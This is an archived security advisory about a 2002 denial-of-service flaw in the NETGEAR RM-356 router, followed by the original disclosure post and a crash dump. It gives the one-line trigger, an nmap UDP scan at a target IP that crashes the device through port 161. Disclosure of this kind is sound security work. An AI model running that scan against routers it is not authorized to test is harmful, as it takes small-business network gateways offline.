SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Router/Bridge/Hub)  >   NETGEAR Router Vendors:   NETGEAR
NETGEAR Router Denial of Service Vulnerability Lets Remote Users Crash the Device With a Port Scan
SecurityTracker Alert ID:  1003565
SecurityTracker URL:  http://securitytracker.com/id/1003565
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 15 2002
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in the NETGEAR RM-356 router. A remote user can cause the device to crash.

It is reported that a remote user can conduct a UDP port scan against the NETGEAR router to cause it to crashdump to the console.

The device tested uses network address translation (NAT) and has a V90 modem WAN interface. The following commandline was used to trigger the flaw:

nmap -sU [ipaddress] -T5

The author of the report states that it appears that a scan to port 161/UDP is what causes the crash.

Impact:   A remote user can cause the router to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.netgear.com/product_view.asp?xrp=4&yrp=12&zrp=93 (Links to External Site)
Cause:   Exception handling error

Message History:   None.


 Source Message Contents

Subject:  Remote DoS in Netgear RM-356


g'day all;

found a denial of service in the IP stack of the Netgear RM-356.
This is your typical `internet gateway in a box'. Small businesses love 'em.

this isn't exactly 'end of the internet' stuff, so I haven't bothered to do any
coochie-coo vendor-informed stuff. Write bad code and sell it, stand up and be
counted for your mistakes. Even simple testing would have uncovered this.

Using lx252 and nmap-254b30, I performed a udp scan against the netgear nat box,
this device has a V90 modem WAN interface.
cmd line was:

snuff# nmap -sU 210.9.238.103 -T5

It seems to be 161/UDP that's vulnerable... what a coincidence :)
TCP connect() scans seem to be ok.
Upon receipt of the nmap probe, the box does a crashdump to console.
Perhaps this is an overflow? IANAasmdev :)

All your RM-356 are belong to us :)















Menu 24.2.1 - System Maintenance - Information
                    Name: *******_netgear
                    Routing: IP
                    RAS F/W Version: V2.21(I.03) | 3/30/2000
                    MODEM 1 F/W Version: V2.210-V90_2M_DLS
                    Country Code: 244
                    LAN
                      Ethernet Address: 00:a0:c5:e3:**:**
                      IP Address: 192.168.0.1
                      IP Mask: 255.255.255.0
                      DHCP: Server
CRASHDUMP::
54f7a0: 00 54 f7 a8 00 21 e9 38 00 54 f8 10 00 21 e9 38     .T...!.8.T...!.8
54f7b0: 00 00 00 07 00 41 37 bc 00 2b 09 ca 00 00 00 00     .....A7..+......
54f7c0: 00 55 24 4c 00 2b 09 b2 00 00 00 00 00 55 24 4c     .U$L.+.......U$L
54f7d0: 00 00 00 05 00 00 00 00 00 21 16 24 00 57 26 04     .........!.$.W&.
54f7e0: 00 58 5e e8 00 21 16 24 00 00 26 04 00 21 16 24     .X^..!.$..&..!.$
54f7f0: 00 41 20 00 00 54 f8 10 00 21 ea 34 00 41 20 00     .A ..T...!.4.A .
54f800: 00 00 00 07 ff ff ff ff 00 54 f8 10 00 21 e6 6e     .........T...!.n
54f810: 00 54 f8 2c 00 21 e6 6e 00 41 37 bc ff ff ff ff     .T.,.!.n.A7.....
54f820: ff ff 20 04 00 5e 2e 60 00 40 f7 20 00 54 f8 68     .. ..^.`.@. .T.h
54f830: 00 21 b0 00 00 00 00 01 00 2b 09 ca ff ff ff ff     .!.......+......
54f840: 00 00 00 07 00 2b 09 b2 00 5e 2e 60 00 00 00 00     .....+...^.`....
54f850: ff ff ff ff 00 00 00 00 00 00 00 00 00 54 f9 9c     .............T..
54f860: 00 5e 2e 60 00 00 00 00 00 54 f8 a8 00 21 a8 1a     .^.`.....T...!..
54f870: 00 00 00 07 ff ff ff ff 00 5e 2e 60 00 00 00 00     .........^.`....
54f880: 00 00 00 08 00 00 00 00 00 00 00 21 00 00 00 24     ...........!...$
54f890: 00 00 00 00 00 54 f9 9c 00 5f ec d0 00 55 24 4c     .....T..._...U$L
54f8a0: 00 55 24 4c 00 5e 2e 60 00 54 f8 fc 00 23 b8 42     .U$L.^.`.T...#.B



Boot Module Version : 4.40. Built at Wed Feb 23 14:00:29 2000














________.-~-.________
Ben Ryan, MCP
Network Engineer
Lansys Technologies
Bendigo, Victoria 
Australia
Phone +61-[0]417 502061
email: ben@bssc.edu.au
URL: http://thrasher.impulse.net.au/index.htm

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC